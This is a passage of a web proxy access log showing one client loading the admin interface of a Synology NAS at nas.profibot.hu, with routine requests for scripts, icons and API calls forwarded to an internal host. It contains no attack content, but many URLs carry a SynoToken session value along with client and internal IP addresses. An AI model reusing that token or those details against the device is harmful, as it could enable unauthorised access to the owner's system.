Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynologyDrive-ShareSync/app_tray.js?v=3.2.1-23280&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 2818] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Core.Upgrade" [Client 84.1.26.27] [Length 50] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 186] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/admin_center.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 423009] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 242] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 91] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 409] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/HybridShare/C2FS.js?v=1.3.2-1037&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 164398] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 426] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 353] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:19 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 28340] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:20 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 52] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:20 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:20 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:21 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 3568] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:21 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 194] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:22 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi/SYNO.Foto.UserInfo" [Client 84.1.26.27] [Length 276] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:22 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 106] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:22 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 190] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:24 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 4326] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PkgManApp/PkgMyDS.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 3437] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:24 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PkgManApp/PkgManApp.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 48026] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webman/desktop/dist/assets/e8cd756c231384653a617238d1e779ae.png" [Client 84.1.26.27] [Length 1839] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/desktop/dist/style.css?v=1661421011" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/ControlPanel_72.png?v=42962-s9" [Client 84.1.26.27] [Length 3074] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PkgManApp/images/package_center_72.png?v=42962-s9" [Client 84.1.26.27] [Length 4822] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/images/default/1x/ResourceMonitor_72.png?v=42962-s9" [Client 84.1.26.27] [Length 5840] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/HelpBrowser/images/1x/help_72.png?v=42962-s9" [Client 84.1.26.27] [Length 7655] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SupportForm/images/1x/SupportCenter_72.png?v=42962-s9" [Client 84.1.26.27] [Length 6085] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SecurityScan/images/security_scan_72.png?v=42962-s9&app_version=1.0" [Client 84.1.26.27] [Length 10211] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/LogCenter/images/log_center_72.png?v=42962-s9&app_version=1.0" [Client 84.1.26.27] [Length 2886] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/StorageManager/images/storage_manager_72.png?v=42962-s9" [Client 84.1.26.27] [Length 6279] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/SynologyDrive/images/DriveAdminConsole_{0}.png&app_version=3.2.1-23280" [Client 84.1.26.27] [Length 6321] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/FileBrowser/images/icon/FileStation_{0}.png&app_version=1.3.4-1404" [Client 84.1.26.27] [Length 6277] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/AntiVirus/images/anti_virus_{0}.png&app_version=1.5.4-3099" [Client 84.1.26.27] [Length 6309] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/WebStation/images/WebStation_{0}.png&app_version=3.1.0-0339" [Client 84.1.26.27] [Length 7495] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/ActiveInsight/images/ActiveInsight_{0}.png&app_version=2.1.3-2606" [Client 84.1.26.27] [Length 2957] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/WebDAVServer/images/icon/WebDav_{0}.png&app_version=2.4.8-10135" [Client 84.1.26.27] [Length 8831] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/VPNCenter/images/VPNServer_{0}.png&app_version=1.4.7-2901" [Client 84.1.26.27] [Length 6585] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/DownloadStation/images/download_station_{0}.png&app_version=3.9.5-4627" [Client 84.1.26.27] [Length 3665] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/SynologyPhotos/images/icon/photos_{0}.png&app_version=1.3.4-0340" [Client 84.1.26.27] [Length 6894] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/VideoStation/images/app/VideoStation_{0}.png&app_version=3.0.7-2512" [Client 84.1.26.27] [Length 4383] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/SynologyDrive-Drive/images/_Favicon/SynologyDrive_{0}.png&app_version=3.2.1-23280" [Client 84.1.26.27] [Length 6534] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/SynologyDrive-ShareSync/images/package-{0}.png&app_version=3.2.1-23280" [Client 84.1.26.27] [Length 8439] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/CloudSync/images/CloudSync_{0}.png&app_version=2.7.2-2464" [Client 84.1.26.27] [Length 8807] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/CodecPack/images/icon/AME_{0}.png&app_version=3.0.1-2004" [Client 84.1.26.27] [Length 5961] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/SynoFinder/images/icon/UniversalSearch_{0}.png&app_version=1.6.1-0542" [Client 84.1.26.27] [Length 7016] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/DirectoryServer/images/LDAPServer_{0}.png&app_version=2.4.59-2711" [Client 84.1.26.27] [Length 6427] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/MariaDB10/images/MariaDB_{0}.png&app_version=10.3.32-1040" [Client 84.1.26.27] [Length 3853] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/OAuthService/images/Authenticator_{0}.png&app_version=1.1.2-0071" [Client 84.1.26.27] [Length 8577] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/HyperBackup/images/HyperBackup_{0}.png&app_version=3.0.2-2531" [Client 84.1.26.27] [Length 8651] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/MediaServer/images/MediaServer_{0}.png&app_version=2.2.1-3406" [Client 84.1.26.27] [Length 5777] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/ScsiTarget/images/SANManager_{0}.png" [Client 84.1.26.27] [Length 6469] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 5265] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/AudioStation/images/AudioStation_{0}.png&app_version=7.0.3-5401" [Client 84.1.26.27] [Length 5019] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/WebService/images/d565d4b0-c664-46d3-8828-6cfc10232149/icon_{0}.png" [Client 84.1.26.27] [Length 5901] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 9969] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/AntiVirus/antivirus.js?v=1.5.4-3099&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 28902] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 7196] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/SecurityScan/synosecurityscan.js?v=1.0&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 19491] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 12224] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:25 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 422] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:26 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 12972] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:26 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/TinyMCE/TinyMCE.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 874] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:26 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AudioPlayer/SoundManager2.js?v=42433&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 17419] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:26 +0000] - 200 200 - GET https nas.profibot.hu "/webman/3rdparty/SynoFinder/chrono.min.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 26419] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:26 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/PersonalSettings/MailDialogBundle.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 4777] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[22/Jan/2026:10:51:26 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AudioPlayer/AudioPlayer.js?v=42962-s9&SynoToken=X741WRjetYUzc" [Client 84.1.26.27] [Length 11219] 